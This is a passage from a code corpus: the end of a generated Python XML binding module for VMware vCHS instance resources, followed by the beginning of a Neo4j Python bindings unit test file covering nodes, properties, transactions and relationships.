            self.exportChildren(outfile, level + 1, namespace_='instance:', name_='ResourceType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='instance:', name_='ResourceType'):
        # Write id/name attributes once each, plus xsi:type for extensions.
        if self.id is not None and 'id' not in already_processed:
            already_processed.add('id')
            outfile.write(' id=%s' % (quote_attrib(self.id), ))
        if self.name is not None and 'name' not in already_processed:
            already_processed.add('name')
            outfile.write(' name=%s' % (quote_attrib(self.name), ))
        if self.extensiontype_ is not None and 'xsi:type' not in already_processed:
            already_processed.add('xsi:type')
            outfile.write(' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"')
            outfile.write(' xsi:type="%s"' % self.extensiontype_)
    def exportChildren(self, outfile, level, namespace_='instance:', name_='ResourceType', fromsubclass_=False, pretty_print=True):
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        for link_ in self.link:
            link_.export(outfile, level, namespace_, name_='link', pretty_print=pretty_print)
    def exportLiteral(self, outfile, level, name_='ResourceType'):
        # Emit a Python-constructor-style literal representation.
        level += 1
        already_processed = set()
        self.exportLiteralAttributes(outfile, level, already_processed, name_)
        if self.hasContent_():
            self.exportLiteralChildren(outfile, level, name_)
    def exportLiteralAttributes(self, outfile, level, already_processed, name_):
        if self.id is not None and 'id' not in already_processed:
            already_processed.add('id')
            showIndent(outfile, level)
            outfile.write('id=%s,\n' % (self.id,))
        if self.name is not None and 'name' not in already_processed:
            already_processed.add('name')
            showIndent(outfile, level)
            outfile.write('name=%s,\n' % (self.name,))
    def exportLiteralChildren(self, outfile, level, name_):
        showIndent(outfile, level)
        outfile.write('link=[\n')
        level += 1
        for link_ in self.link:
            showIndent(outfile, level)
            outfile.write('model_.LinkType(\n')
            link_.exportLiteral(outfile, level, name_='LinkType')
            showIndent(outfile, level)
            outfile.write('),\n')
        level -= 1
        showIndent(outfile, level)
        outfile.write('],\n')
    def build(self, node):
        # Populate this instance from a parsed XML element node.
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # Read id/name and an optional xsi:type (extension marker).
        value = find_attr_value_('id', node)
        if value is not None and 'id' not in already_processed:
            already_processed.add('id')
            self.id = value
        value = find_attr_value_('name', node)
        if value is not None and 'name' not in already_processed:
            already_processed.add('name')
            self.name = value
        value = find_attr_value_('xsi:type', node)
        if value is not None and 'xsi:type' not in already_processed:
            already_processed.add('xsi:type')
            self.extensiontype_ = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Each <link> child becomes a LinkType appended to self.link.
        if nodeName_ == 'link':
            obj_ = LinkType.factory()
            obj_.build(child_)
            self.link.append(obj_)
            obj_.original_tagname_ = 'link'
# end class ResourceType
class LinkType(GeneratedsSuper):
    """Generated binding for a <link> element: an href plus type/id/rel/name
    attributes.  Attribute-only -- a link never carries child content."""
    subclass = None
    superclass = None
    def __init__(self, href=None, type_=None, id=None, rel=None, name=None):
        self.original_tagname_ = None
        self.href = _cast(None, href)
        self.type_ = _cast(None, type_)
        self.id = _cast(None, id)
        self.rel = _cast(None, rel)
        self.name = _cast(None, name)
    def factory(*args_, **kwargs_):
        # Instantiate the registered subclass when one has been installed.
        if LinkType.subclass:
            return LinkType.subclass(*args_, **kwargs_)
        else:
            return LinkType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_href(self): return self.href
    def set_href(self, href): self.href = href
    def get_type(self): return self.type_
    def set_type(self, type_): self.type_ = type_
    def get_id(self): return self.id
    def set_id(self, id): self.id = id
    def get_rel(self): return self.rel
    def set_rel(self, rel): self.rel = rel
    def get_name(self): return self.name
    def set_name(self, name): self.name = name
    def hasContent_(self):
        # LinkType has no child elements, so the generated condition is the
        # empty tuple () and this always returns False.
        if (
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespace_='instance:', name_='LinkType', namespacedef_='xmlns:instance="http://www.vmware.com/vchs/sc/instance/v1"', pretty_print=True):
        # Serialize this object as an XML element to outfile.
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='LinkType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespace_='instance:', name_='LinkType', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            # No content (always the case here) -- emit a self-closing tag.
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='instance:', name_='LinkType'):
        if self.href is not None and 'href' not in already_processed:
            already_processed.add('href')
            outfile.write(' href=%s' % (self.gds_format_string(quote_attrib(self.href).encode(ExternalEncoding), input_name='href'), ))
        if self.type_ is not None and 'type_' not in already_processed:
            already_processed.add('type_')
            outfile.write(' type=%s' % (quote_attrib(self.type_), ))
        if self.id is not None and 'id' not in already_processed:
            already_processed.add('id')
            outfile.write(' id=%s' % (quote_attrib(self.id), ))
        if self.rel is not None and 'rel' not in already_processed:
            already_processed.add('rel')
            outfile.write(' rel=%s' % (quote_attrib(self.rel), ))
        if self.name is not None and 'name' not in already_processed:
            already_processed.add('name')
            outfile.write(' name=%s' % (quote_attrib(self.name), ))
    def exportChildren(self, outfile, level, namespace_='instance:', name_='LinkType', fromsubclass_=False, pretty_print=True):
        # No child elements defined for LinkType.
        pass
    def exportLiteral(self, outfile, level, name_='LinkType'):
        # Serialize this object as a Python constructor-call literal.
        level += 1
        already_processed = set()
        self.exportLiteralAttributes(outfile, level, already_processed, name_)
        if self.hasContent_():
            self.exportLiteralChildren(outfile, level, name_)
    def exportLiteralAttributes(self, outfile, level, already_processed, name_):
        if self.href is not None and 'href' not in already_processed:
            already_processed.add('href')
            showIndent(outfile, level)
            outfile.write('href="%s",\n' % (self.href,))
        if self.type_ is not None and 'type_' not in already_processed:
            already_processed.add('type_')
            showIndent(outfile, level)
            outfile.write('type_=%s,\n' % (self.type_,))
        if self.id is not None and 'id' not in already_processed:
            already_processed.add('id')
            showIndent(outfile, level)
            outfile.write('id=%s,\n' % (self.id,))
        if self.rel is not None and 'rel' not in already_processed:
            already_processed.add('rel')
            showIndent(outfile, level)
            outfile.write('rel=%s,\n' % (self.rel,))
        if self.name is not None and 'name' not in already_processed:
            already_processed.add('name')
            showIndent(outfile, level)
            outfile.write('name=%s,\n' % (self.name,))
    def exportLiteralChildren(self, outfile, level, name_):
        pass
    def build(self, node):
        # Populate this object from an XML node; returns self.
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        value = find_attr_value_('href', node)
        if value is not None and 'href' not in already_processed:
            already_processed.add('href')
            self.href = value
        value = find_attr_value_('type', node)
        if value is not None and 'type' not in already_processed:
            already_processed.add('type')
            self.type_ = value
        value = find_attr_value_('id', node)
        if value is not None and 'id' not in already_processed:
            already_processed.add('id')
            self.id = value
        value = find_attr_value_('rel', node)
        if value is not None and 'rel' not in already_processed:
            already_processed.add('rel')
            self.rel = value
        value = find_attr_value_('name', node)
        if value is not None and 'name' not in already_processed:
            already_processed.add('name')
            self.name = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        pass
# end class LinkType
class InstanceType(ResourceType):
    """5.7 Provides the details of the instance. Includes details like id
    of the instance, Api endpoint of the instance, service group id
    of the instance, service plan id used to create the instance,
    etc."""
    subclass = None
    superclass = ResourceType
    def __init__(self, id=None, name=None, link=None, description=None, region=None, instanceVersion=None, planId=None, serviceGroupId=None, apiUrl=None, dashboardUrl=None, instanceAttributes=None):
        self.original_tagname_ = None
        super(InstanceType, self).__init__(id, name, link, )
        self.description = description
        self.region = region
        self.instanceVersion = instanceVersion
        self.planId = planId
        self.serviceGroupId = serviceGroupId
        self.apiUrl = apiUrl
        self.dashboardUrl = dashboardUrl
        self.instanceAttributes = instanceAttributes
    def factory(*args_, **kwargs_):
        # Instantiate the registered subclass when one has been installed.
        if InstanceType.subclass:
            return InstanceType.subclass(*args_, **kwargs_)
        else:
            return InstanceType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_description(self): return self.description
    def set_description(self, description): self.description = description
    def get_region(self): return self.region
    def set_region(self, region): self.region = region
    def get_instanceVersion(self): return self.instanceVersion
    def set_instanceVersion(self, instanceVersion): self.instanceVersion = instanceVersion
    def get_planId(self): return self.planId
    def set_planId(self, planId): self.planId = planId
    def get_serviceGroupId(self): return self.serviceGroupId
    def set_serviceGroupId(self, serviceGroupId): self.serviceGroupId = serviceGroupId
    def get_apiUrl(self): return self.apiUrl
    def set_apiUrl(self, apiUrl): self.apiUrl = apiUrl
    def get_dashboardUrl(self): return self.dashboardUrl
    def set_dashboardUrl(self, dashboardUrl): self.dashboardUrl = dashboardUrl
    def get_instanceAttributes(self): return self.instanceAttributes
    def set_instanceAttributes(self, instanceAttributes): self.instanceAttributes = instanceAttributes
    def validate_NonEmptyString(self, value):
        # Validate type NonEmptyString, a restriction on xs:string.
        # NOTE(review): generated stub -- no actual validation is performed.
        pass
    def hasContent_(self):
        # True when at least one child element (or inherited content) is set.
        if (
            self.description is not None or
            self.region is not None or
            self.instanceVersion is not None or
            self.planId is not None or
            self.serviceGroupId is not None or
            self.apiUrl is not None or
            self.dashboardUrl is not None or
            self.instanceAttributes is not None or
            super(InstanceType, self).hasContent_()
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespace_='instance:', name_='InstanceType', namespacedef_='', pretty_print=True):
        # Serialize this object as an XML element to outfile.
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='InstanceType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespace_='instance:', name_='InstanceType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='instance:', name_='InstanceType'):
        # Attributes (id, name) are inherited from ResourceType.
        super(InstanceType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='InstanceType')
    def exportChildren(self, outfile, level, namespace_='instance:', name_='InstanceType', fromsubclass_=False, pretty_print=True):
        # Emit inherited children (link) first, then this class's elements.
        super(InstanceType, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.description is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<%sdescription>%s</%sdescription>%s' % (namespace_, self.gds_format_string(quote_xml(self.description).encode(ExternalEncoding), input_name='description'), namespace_, eol_))
        if self.region is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<%sregion>%s</%sregion>%s' % (namespace_, self.gds_format_string(quote_xml(self.region).encode(ExternalEncoding), input_name='region'), namespace_, eol_))
        if self.instanceVersion is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<%sinstanceVersion>%s</%sinstanceVersion>%s' % (namespace_, self.gds_format_string(quote_xml(self.instanceVersion).encode(ExternalEncoding), input_name='instanceVersion'), namespace_, eol_))
        if self.planId is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<%splanId>%s</%splanId>%s' % (namespace_, self.gds_format_string(quote_xml(self.planId).encode(ExternalEncoding), input_name='planId'), namespace_, eol_))
        if self.serviceGroupId is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<%sserviceGroupId>%s</%sserviceGroupId>%s' % (namespace_, self.gds_format_string(quote_xml(self.serviceGroupId).encode(ExternalEncoding), input_name='serviceGroupId'), namespace_, eol_))
        if self.apiUrl is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<%sapiUrl>%s</%sapiUrl>%s' % (namespace_, self.gds_format_string(quote_xml(self.apiUrl).encode(ExternalEncoding), input_name='apiUrl'), namespace_, eol_))
        if self.dashboardUrl is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<%sdashboardUrl>%s</%sdashboardUrl>%s' % (namespace_, self.gds_format_string(quote_xml(self.dashboardUrl).encode(ExternalEncoding), input_name='dashboardUrl'), namespace_, eol_))
        if self.instanceAttributes is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<%sinstanceAttributes>%s</%sinstanceAttributes>%s' % (namespace_, self.gds_format_string(quote_xml(self.instanceAttributes).encode(ExternalEncoding), input_name='instanceAttributes'), namespace_, eol_))
    def exportLiteral(self, outfile, level, name_='InstanceType'):
        # Serialize this object as a Python constructor-call literal.
        level += 1
        already_processed = set()
        self.exportLiteralAttributes(outfile, level, already_processed, name_)
        if self.hasContent_():
            self.exportLiteralChildren(outfile, level, name_)
    def exportLiteralAttributes(self, outfile, level, already_processed, name_):
        super(InstanceType, self).exportLiteralAttributes(outfile, level, already_processed, name_)
    def exportLiteralChildren(self, outfile, level, name_):
        super(InstanceType, self).exportLiteralChildren(outfile, level, name_)
        if self.description is not None:
            showIndent(outfile, level)
            outfile.write('description=%s,\n' % quote_python(self.description).encode(ExternalEncoding))
        if self.region is not None:
            showIndent(outfile, level)
            outfile.write('region=%s,\n' % quote_python(self.region).encode(ExternalEncoding))
        if self.instanceVersion is not None:
            showIndent(outfile, level)
            outfile.write('instanceVersion=%s,\n' % quote_python(self.instanceVersion).encode(ExternalEncoding))
        if self.planId is not None:
            showIndent(outfile, level)
            outfile.write('planId=%s,\n' % quote_python(self.planId).encode(ExternalEncoding))
        if self.serviceGroupId is not None:
            showIndent(outfile, level)
            outfile.write('serviceGroupId=%s,\n' % quote_python(self.serviceGroupId).encode(ExternalEncoding))
        if self.apiUrl is not None:
            showIndent(outfile, level)
            outfile.write('apiUrl=%s,\n' % quote_python(self.apiUrl).encode(ExternalEncoding))
        if self.dashboardUrl is not None:
            showIndent(outfile, level)
            outfile.write('dashboardUrl=%s,\n' % quote_python(self.dashboardUrl).encode(ExternalEncoding))
        if self.instanceAttributes is not None:
            showIndent(outfile, level)
            outfile.write('instanceAttributes=%s,\n' % quote_python(self.instanceAttributes).encode(ExternalEncoding))
    def build(self, node):
        # Populate this object from an XML node; returns self.
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        super(InstanceType, self).buildAttributes(node, attrs, already_processed)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Read this class's simple text children, then delegate to the base
        # class (fromsubclass_=True) for inherited <link> children.
        if nodeName_ == 'description':
            description_ = child_.text
            description_ = self.gds_validate_string(description_, node, 'description')
            self.description = description_
            self.validate_NonEmptyString(self.description)    # validate type NonEmptyString
        elif nodeName_ == 'region':
            region_ = child_.text
            region_ = self.gds_validate_string(region_, node, 'region')
            self.region = region_
            self.validate_NonEmptyString(self.region)    # validate type NonEmptyString
        elif nodeName_ == 'instanceVersion':
            instanceVersion_ = child_.text
            instanceVersion_ = self.gds_validate_string(instanceVersion_, node, 'instanceVersion')
            self.instanceVersion = instanceVersion_
            self.validate_NonEmptyString(self.instanceVersion)    # validate type NonEmptyString
        elif nodeName_ == 'planId':
            planId_ = child_.text
            planId_ = self.gds_validate_string(planId_, node, 'planId')
            self.planId = planId_
            self.validate_NonEmptyString(self.planId)    # validate type NonEmptyString
        elif nodeName_ == 'serviceGroupId':
            serviceGroupId_ = child_.text
            serviceGroupId_ = self.gds_validate_string(serviceGroupId_, node, 'serviceGroupId')
            self.serviceGroupId = serviceGroupId_
            self.validate_NonEmptyString(self.serviceGroupId)    # validate type NonEmptyString
        elif nodeName_ == 'apiUrl':
            apiUrl_ = child_.text
            apiUrl_ = self.gds_validate_string(apiUrl_, node, 'apiUrl')
            self.apiUrl = apiUrl_
        elif nodeName_ == 'dashboardUrl':
            dashboardUrl_ = child_.text
            dashboardUrl_ = self.gds_validate_string(dashboardUrl_, node, 'dashboardUrl')
            self.dashboardUrl = dashboardUrl_
        elif nodeName_ == 'instanceAttributes':
            instanceAttributes_ = child_.text
            instanceAttributes_ = self.gds_validate_string(instanceAttributes_, node, 'instanceAttributes')
            self.instanceAttributes = instanceAttributes_
            self.validate_NonEmptyString(self.instanceAttributes)    # validate type NonEmptyString
        super(InstanceType, self).buildChildren(child_, node, nodeName_, True)
# end class InstanceType
# Maps XML root-element tag names to the generated classes used to parse them.
GDSClassesMapping = {
    'Resource': ResourceType,
    'instances': InstanceType,
    'InstanceList': InstanceListType,
    'Instance': InstanceType,
    'link': LinkType,
    'Link': LinkType,
    'InstanceSpecParams': InstanceSpecParamsType,
}
USAGE_TEXT = """
Usage: python <Parser>.py [ -s ] <in_xml_file>
"""


def usage():
    """Print the command-line usage message and exit with status 1."""
    # print() with a single argument behaves identically in Python 2 and 3;
    # the original bare ``print USAGE_TEXT`` statement is a SyntaxError
    # under Python 3.
    print(USAGE_TEXT)
    sys.exit(1)
def get_root_tag(node):
    """Return (tag name, generated class) for an XML root node.

    Falls back to a same-named module global when the tag is not in
    GDSClassesMapping; the class may be None if nothing matches.
    """
    tag = Tag_pattern_.match(node.tag).groups()[-1]
    root_class = GDSClassesMapping.get(tag)
    if root_class is None:
        root_class = globals().get(tag)
    return tag, root_class
def parse(inFileName, silence=False):
    """Parse an XML file and, unless silence is set, echo it to stdout."""
    document = parsexml_(inFileName)
    root_node = document.getroot()
    root_tag, root_class = get_root_tag(root_node)
    if root_class is None:
        root_tag = 'InstanceSpecParamsType'
        root_class = InstanceSpecParamsType
    root_obj = root_class.factory()
    root_obj.build(root_node)
    # Drop the DOM so its memory can be reclaimed.
    document = None
    if not silence:
        sys.stdout.write('<?xml version="1.0" ?>\n')
        root_obj.export(
            sys.stdout, 0, name_=root_tag,
            namespacedef_='xmlns:instance="http://www.vmware.com/vchs/sc/instance/v1"',
            pretty_print=True)
    return root_obj
def parseEtree(inFileName, silence=False):
    """Parse an XML file; also return an etree element and node mappings."""
    document = parsexml_(inFileName)
    root_node = document.getroot()
    root_tag, root_class = get_root_tag(root_node)
    if root_class is None:
        root_tag = 'InstanceSpecParamsType'
        root_class = InstanceSpecParamsType
    root_obj = root_class.factory()
    root_obj.build(root_node)
    # Drop the DOM so its memory can be reclaimed.
    document = None
    mapping = {}
    root_element = root_obj.to_etree(None, name_=root_tag, mapping_=mapping)
    reverse_mapping = root_obj.gds_reverse_node_mapping(mapping)
    if not silence:
        content = etree_.tostring(
            root_element, pretty_print=True,
            xml_declaration=True, encoding="utf-8")
        sys.stdout.write(content)
        sys.stdout.write('\n')
    return root_obj, root_element, mapping, reverse_mapping
def parseString(inString, silence=False):
    """Parse XML from a string and, unless silence is set, echo it to stdout."""
    from StringIO import StringIO  # Python 2 module, matching this file
    document = parsexml_(StringIO(inString))
    root_node = document.getroot()
    root_tag, root_class = get_root_tag(root_node)
    if root_class is None:
        root_tag = 'InstanceSpecParamsType'
        root_class = InstanceSpecParamsType
    root_obj = root_class.factory()
    root_obj.build(root_node)
    # Drop the DOM so its memory can be reclaimed.
    document = None
    if not silence:
        sys.stdout.write('<?xml version="1.0" ?>\n')
        root_obj.export(
            sys.stdout, 0, name_=root_tag,
            namespacedef_='xmlns:instance="http://www.vmware.com/vchs/sc/instance/v1"')
    return root_obj
def parseLiteral(inFileName, silence=False):
    """Parse an XML file and optionally emit it as a Python literal module."""
    document = parsexml_(inFileName)
    root_node = document.getroot()
    root_tag, root_class = get_root_tag(root_node)
    if root_class is None:
        root_tag = 'InstanceSpecParamsType'
        root_class = InstanceSpecParamsType
    root_obj = root_class.factory()
    root_obj.build(root_node)
    # Drop the DOM so its memory can be reclaimed.
    document = None
    if not silence:
        sys.stdout.write('#from instanceType import *\n\n')
        sys.stdout.write('import instanceType as model_\n\n')
        sys.stdout.write('rootObj = model_.rootClass(\n')
        root_obj.exportLiteral(sys.stdout, 0, name_=root_tag)
        sys.stdout.write(')\n')
    return root_obj
def main():
    """Command-line entry point: parse the single XML file argument."""
    args = sys.argv[1:]
    if len(args) != 1:
        usage()  # prints the usage text and exits with status 1
    parse(args[0])
if __name__ == '__main__':
    # Run the command-line parser when executed as a script.
    #import pdb; pdb.set_trace()
    main()
# Public API of this generated module.
__all__ = [
    "InstanceListType",
    "InstanceSpecParamsType",
    "InstanceType",
    "LinkType",
    "ResourceType"
]
|
denismakogon/pyvcloud
|
pyvcloud/schema/vchs/ondemand/sc/sc/instanceType.py
|
Python
|
apache-2.0
| 66,418
|
# -*- mode: Python; coding: utf-8 -*-
# Copyright (c) 2002-2013 "Neo Technology,"
# Network Engine for Objects in Lund AB [http://neotechnology.com]
#
# This file is part of Neo4j.
#
# Neo4j is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from __future__ import with_statement
import unit_tests
import tempfile, os
class GraphTest(unit_tests.GraphDatabaseTest):
    """Core API tests for the embedded Neo4j Python bindings.

    The ``START SNIPPET``/``END SNIPPET`` comment markers delimit code that
    appears to be extracted verbatim into the published documentation, so
    the code between them should not be reformatted.  Note this module uses
    Python 2 syntax (``except Exception, e``).
    """
    def test_create_db(self):
        # Creates a database in a temp directory and always cleans it up.
        folder_to_put_db_in = tempfile.mkdtemp()
        try:
            # START SNIPPET: creatingDatabase
            from neo4j import GraphDatabase
            # Create db
            db = GraphDatabase(folder_to_put_db_in)
            # Always shut down your database
            db.shutdown()
            # END SNIPPET: creatingDatabase
        finally:
            if os.path.exists(folder_to_put_db_in):
                import shutil
                shutil.rmtree(folder_to_put_db_in)
    def test_create_configured_db(self):
        folder_to_put_db_in = tempfile.mkdtemp()
        try:
            # START SNIPPET: creatingConfiguredDatabase
            from neo4j import GraphDatabase
            # Example configuration parameters
            db = GraphDatabase(folder_to_put_db_in, string_block_size=200, array_block_size=240)
            db.shutdown()
            # END SNIPPET: creatingConfiguredDatabase
        finally:
            if os.path.exists(folder_to_put_db_in):
                import shutil
                shutil.rmtree(folder_to_put_db_in)
    def test_with_statement_transactions(self):
        db = self.graphdb
        # START SNIPPET: withBasedTransactions
        # Start a transaction
        with db.transaction:
            # This is inside the transactional
            # context. All work done here
            # will either entirely succeed,
            # or no changes will be applied at all.
            # Create a node
            node = db.node()
            # Give it a name
            node['name'] = 'Cat Stevens'
        # The transaction is automatically
        # commited when you exit the with
        # block.
        # END SNIPPET: withBasedTransactions
        self.assertNotEqual(node, None)
    def test_create_node(self):
        with self.graphdb.transaction:
            node = self.graphdb.node()
        self.assertNotEqual(node, None)
    def test_delete_node(self):
        db = self.graphdb
        # START SNIPPET: deleteNode
        with db.transaction:
            node = db.node()
            node.delete()
        # END SNIPPET: deleteNode
        # Looking the node up by id afterwards must fail with KeyError.
        try:
            self.graphdb.node[node.id]
            self.assertEqual(True,False)
        except Exception, e:
            self.assertTrue(isinstance(e, KeyError))
    def test_delete_node_by_id(self):
        db = self.graphdb
        with db.transaction:
            node = db.node()
            some_node_id = node.id
        # START SNIPPET: deleteByIdNode
        with db.transaction:
            del db.node[some_node_id]
        # END SNIPPET: deleteByIdNode
        try:
            self.graphdb.node[node.id]
            self.assertEqual(True,False)
        except Exception, e:
            self.assertTrue(isinstance(e, KeyError))
    def test_create_node_with_properties(self):
        db = self.graphdb
        # START SNIPPET: createNode
        with db.transaction:
            # Create a node
            thomas = db.node(name='Thomas Anderson', age=42)
        # END SNIPPET: createNode
        self.assertNotEqual(thomas, None)
        self.assertEquals(thomas['name'], 'Thomas Anderson')
        self.assertEquals(thomas['age'], 42)
    def test_properties(self):
        # Exercises set/get/delete and iteration of node/rel properties.
        db = self.graphdb
        with db.transaction:
            node_or_rel = db.node()
        # START SNIPPET: setProperties
        with db.transaction:
            node_or_rel['name'] = 'Thomas Anderson'
            node_or_rel['age'] = 42
            node_or_rel['favourite_numbers'] = [1,2,3]
            node_or_rel['favourite_words'] = ['banana','blue']
        # END SNIPPET: setProperties
        # START SNIPPET: programaticSetProperties
        with db.transaction:
            node_or_rel.set('name', 'Thomas Anderson')
        # END SNIPPET: programaticSetProperties
        # START SNIPPET: getProperties
        numbers = node_or_rel['favourite_numbers']
        # END SNIPPET: getProperties
        # START SNIPPET: programaticGetProperties
        numbers = node_or_rel.get_property('favourite_numbers')
        # With default value
        value = node_or_rel.get_property('some_property', 'defaultvalue')
        # END SNIPPET: programaticGetProperties
        self.assertEqual(value, 'defaultvalue')
        # START SNIPPET: deleteProperties
        with db.transaction:
            del node_or_rel['favourite_numbers']
        # END SNIPPET: deleteProperties
            del node_or_rel['favourite_words']
        # START SNIPPET: loopProperties
        # Loop key and value at the same time
        for key, value in node_or_rel.items():
            pass
        # Loop property keys
        for key in node_or_rel.keys():
            pass
        # Loop property values
        for value in node_or_rel.values():
            pass
        # END SNIPPET: loopProperties
        items = list(node_or_rel.items())
        self.assertEqual(len(items), 2)
        self.assertEqual(items[1][0],'age')
        self.assertEqual(items[1][1],42)
        keys = list(node_or_rel.keys())
        self.assertEqual(len(keys), 2)
        self.assertEqual(keys[1],'age')
        values = list(node_or_rel.values())
        self.assertEqual(len(values), 2)
        self.assertEqual(values[1],42)
    def test_property_types(self):
        # Verifies the Python types round-tripped through the database.
        with self.graphdb.transaction:
            n = self.graphdb.node()
            # Booleans
            n['a_bool'] = True
            self.assertEqual(n['a_bool'], True)
            self.assertEqual(type(n['a_bool']), bool)
            self.assertEqual(type(n.get_property('a_bool')), bool)
            n['a_bool'] = False
            self.assertEqual(n['a_bool'], False)
            self.assertEqual(type(n['a_bool']), bool)
            self.assertEqual(type(n.get_property('a_bool')), bool)
            # Strings
            n['a_string'] = 'my fancy string I made'
            self.assertEqual(n['a_string'], 'my fancy string I made')
            self.assertEqual(type(n['a_string']), unicode)
            # Longs
            n['a_long'] = 1337
            self.assertEqual(n['a_long'], 1337)
            self.assertEqual(type(n['a_long']), long)
            # Lists
            n['a_list'] = [1,2,3]
            self.assertEqual(n['a_list'], [1,2,3])
            self.assertEqual(type(n['a_list']), list)
    def test_get_property_with_default(self):
        with self.graphdb.transaction:
            n = self.graphdb.node()
            n['a_bool'] = True
            self.assertEqual(n.get_property('a_bool'), True)
            self.assertEqual(n.get_property('a_bool', False), True)
            self.assertEqual(n.get_property('doesnt_exist'), None)
            self.assertEqual(n.get_property('doesnt_exist', False), False)
    def test_remove_properties(self):
        with self.graphdb.transaction:
            node = self.graphdb.node(name='Thomas Anderson', age=42)
            self.assertEqual(node['name'], 'Thomas Anderson')
            del node['name']
            try:
                node['name']
                self.assertTrue(False)
            except Exception, e:
                self.assertTrue(isinstance(e, KeyError))
    def test_get_node_by_id(self):
        db = self.graphdb
        with db.transaction:
            node = db.node()
            some_node_id = node.id
        # START SNIPPET: getNodeById
        # You don't have to be in a transaction
        # to do read operations.
        a_node = db.node[some_node_id]
        # Ids on nodes and relationships are available via the "id"
        # property, eg.:
        node_id = a_node.id
        # END SNIPPET: getNodeById
        self.assertNotEqual(a_node, None)
        self.assertEqual(node_id, some_node_id)
    def test_get_all_nodes(self):
        # A fresh db already contains the reference node, hence the count of 2.
        db = self.graphdb
        with db.transaction:
            node = db.node()
        # START SNIPPET: getAllNodes
        for node in db.nodes:
            pass
        # Shorthand for iterating through
        # and counting all nodes
        number_of_nodes = len(db.nodes)
        # END SNIPPET: getAllNodes
        self.assertEqual(2, number_of_nodes)
        nodes = list(db.nodes)
        self.assertEqual(2, len(nodes))
    def test_get_all_relationships(self):
        db = self.graphdb
        with db.transaction:
            node = db.node()
            db.reference_node.Knows(node)
            node.Knows(db.reference_node)
            node.Knows(node)
        # START SNIPPET: getAllRelationships
        for rel in db.relationships:
            pass
        # Shorthand for iterating through
        # and counting all relationships
        number_of_rels = len(db.relationships)
        # END SNIPPET: getAllRelationships
        self.assertEqual(3, number_of_rels)
        rels = list(db.relationships)
        self.assertEqual(3, len(rels))
    def test_get_reference_node(self):
        db = self.graphdb
        # START SNIPPET: getReferenceNode
        reference = db.reference_node
        # END SNIPPET: getReferenceNode
        self.assertNotEqual(reference, None)
    def test_can_create_relationship(self):
        db = self.graphdb
        # START SNIPPET: createRelationship
        with db.transaction:
            # Nodes to create a relationship between
            steven = self.graphdb.node(name='Steve Brook')
            poplar_bluff = self.graphdb.node(name='Poplar Bluff')
            # Create a relationship of type "mayor_of"
            relationship = steven.mayor_of(poplar_bluff, since="12th of July 2012")
            # Or, to create relationship types with names
            # that would not be possible with the above
            # method.
            steven.relationships.create('mayor_of', poplar_bluff, since="12th of July 2012")
        # END SNIPPET: createRelationship
            secondrel = poplar_bluff.likes(steven, message="buh")
        message = ''
        for rel in steven.mayor_of:
            message += "%s %s %s" % (
               rel.start['name'],
